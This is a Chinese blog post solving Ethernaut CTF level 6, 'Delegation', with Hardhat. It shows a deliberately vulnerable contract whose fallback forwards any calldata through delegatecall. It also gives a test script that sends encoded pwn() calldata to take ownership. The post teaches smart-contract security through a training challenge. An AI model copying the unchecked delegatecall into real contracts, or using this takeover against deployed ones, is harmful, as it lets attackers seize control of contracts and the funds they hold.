用Hardhat闯关Ethernaut题6 -delegation

  • 时间:
  • 浏览:166
  • 来源:区块链技术网

开坑使用Hardhat闯关Ethernaut CTF题,提高合约和测试脚本的能力,后续也会增加Paradigm CTF的闯关题目。

Delegation合约

任务:获取Delegation合约的所有权。

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;
import "hardhat/console.sol";

contract Delegate {
    address public owner;

    constructor(address _owner) public {
        owner = _owner;
    }

    function pwn() public {
        owner = msg.sender;
    }
}

contract Delegation {
    address public owner;
    Delegate delegate;

    constructor(address _delegateAddress) public {
        delegate = Delegate(_delegateAddress);
        owner = msg.sender;
    }

    fallback() external {
        (bool result, ) = address(delegate).delegatecall(msg.data);
        if (result) {
            console.log(result);
            this;
        }
    }
}

这题主要是理解delegatecallcall的区别:https://github.com/AmazingAng/WTFSolidity/tree/main/23_Delegatecall ,也就是说此题要是更改Delegation的owner,需要调用Delegate合约的pwn函数,也就是触发Delegation合约的fallback,fallback的触发条件:

触发fallback() 还是 receive()?
           接收ETH
              |
         msg.data是空?
            /  \
          是    否
          /      \
receive()存在?   fallback()
        / \
       是  否
      /     \
receive()   fallback()

也就是说发送一笔交易 data不为空就行。

测试脚本:

const { expect } = require("chai");
const { ethers } = require("hardhat");
const { MaxUint256 } = require("@ethersproject/constants");
const { BigNumber } = require("ethers");
const { parseEther } = require("ethers/lib/utils");
describe("test", function () {
    var Delegation;
    var Delegate;
    it("init params", async function () {
        [deployer, ...users] = await ethers.getSigners();
    });
    it("deploy", async function () {
        const DelegateInstance = await ethers.getContractFactory("Delegate");
        Delegate = await DelegateInstance.deploy(users[0].address);

        const DelegationInstance = await ethers.getContractFactory("Delegation");
        Delegation = await DelegationInstance.deploy(Delegate.address);
    });
    it("hack test", async function () {
        console.log(await Delegation.owner());

        const abi = ["function pwn() external"];
        const interface = new ethers.utils.Interface(abi);

        const callData = interface.encodeFunctionData(`pwn`, []);
        const res = await users[0].sendTransaction({
            to: Delegation.address,
            data: callData,
        });
        await res.wait();
        console.log(await Delegation.owner());
    });
});

运行结果:

Github:hardhat测试仓库

本文参与区块链技术网 ,好文好收益,欢迎正在阅读的你也加入。

  • 发表于 2022-09-14 14:33
  • 阅读 ( 206 )
  • 学分 ( 4 )
  • 分类:智能合约

猜你喜欢

用Hardhat闯关Ethernaut题5 -token

开坑使用Hardhat闯关EthernautCTF题,提高合约和测试脚本的能力,后续也会增加ParadigmCTF的闯关题目。#Token合约任务:最初部署的时候你有初始的20

2022-11-06

用Hardhat闯关Ethernaut题6 -delegation

开坑使用Hardhat闯关EthernautCTF题,提高合约和测试脚本的能力,后续也会增加ParadigmCTF的闯关题目。#Delegation合约任务:获取Delegat

2022-11-06

用Hardhat闯关Ethernaut题7 -Force

开坑使用Hardhat闯关EthernautCTF题,提高合约和测试脚本的能力,后续也会增加ParadigmCTF的闯关题目。#Force合约任务:让合约的余额大于0,也就是能

2022-11-06

用Hardhat闯关Ethernaut题8 -vault

开坑使用Hardhat闯关EthernautCTF题,提高合约和测试脚本的能力,后续也会增加ParadigmCTF的闯关题目。#Vault合约任务:猜对状态变量`passwor

2022-11-06

用Hardhat闯关Ethernaut题9 -king

开坑使用Hardhat闯关EthernautCTF题,提高合约和测试脚本的能力,后续也会增加ParadigmCTF的闯关题目。#King合约任务:自己变成king,并且阻止别人

2022-11-06